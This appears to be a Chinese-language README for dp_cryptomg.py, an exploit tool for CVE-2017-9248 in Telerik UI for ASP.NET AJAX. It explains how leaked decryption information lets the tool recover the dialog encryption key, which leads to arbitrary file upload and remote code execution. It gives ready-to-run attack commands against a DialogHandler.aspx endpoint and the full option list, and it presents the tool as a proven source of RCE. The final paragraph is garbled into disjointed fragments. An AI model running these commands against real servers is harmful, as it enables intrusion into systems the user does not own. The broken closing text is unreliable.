另一个用于利用 CVE-2017-9248 的工具,这是 Telerik UI for ASP.NET AJAX 对话框处理程序中的一个加密弱点。利用该漏洞可以访问一个文件管理器工具,该工具能够上传任意文件,通常会导致远程代码执行。
该漏洞是由于在解密 Telerik "DialogParameters"(一系列加密的配置值)过程中的信息泄露导致的。这些值被提供给用户,然后作为用户输入回显给服务器。解密过程中泄露的信息使得能够系统地发现 Telerik.Web.UI.DialogParametersEncryptionKey。有关该漏洞及工具工作原理的深入介绍,请访问我们的博客文章:https://blog.blacklanternsecurity.com/p/yet-another-telerik-ui-revisit。

原始的用于利用 CVE-2017-9248 的工具 dp_crypto 对构建本工具起到了不可估量的作用。更不用说,这些年来它已经为我们带来了大量的 RCE 实例 :)
SR Labs 在其博客文章 Achieving Telerik Remote Code Execution 100 Time Faster 中的研究是本工具所使用技术的基础,并启发我们创建了它。
示例(基本用法):
python3 dp_cryptomg.py http://example.com/Telerik.Web.UI.DialogHandler.aspx
示例(设置自定义密钥长度并使用代理):
python3 dp_cryptomg.py -l 40 -p http://127.0.0.1:8080 http://example.com/Telerik.Web.UI.DialogHandler.aspx
usage: dp_cryptomg.py [-h] [-d] [-c COOKIE] [-k KNOWN_KEY] [-v VERSION] [-l LENGTH] [-p PROXY] [-s] [-S] url
positional arguments:
url The target URL
optional arguments:
-h, --help show this help message and exit
-d, --debug Enable debugging mode
-c COOKIE, --cookie COOKIE
Add optional cookie header to every request
-k KNOWN_KEY, --known-key KNOWN_KEY
The partial or complete known key, in HEX format
-v VERSION, --version VERSION
Specify the Telerik version, if known
-l LENGTH, --length LENGTH
The length of the key, if known
-p PROXY, --proxy PROXY
Optionally set an HTTP proxy
-s, --simple Turn off the fancy interface
-S, --super-simple Turn off the fancy interface and show minimal output
-q, --quick-check Only detect likely vulnerability and skip exploitation (forces simple mode)
Telerik.Web.UI.DialogHandler.aspx 和 Telerik.Web.UI.SpellCheckHandler.axd 两个端点恢复密钥-l 参数手动指定长度-s 或 -S 选项禁用它。这也会略微提高利用过程的速度。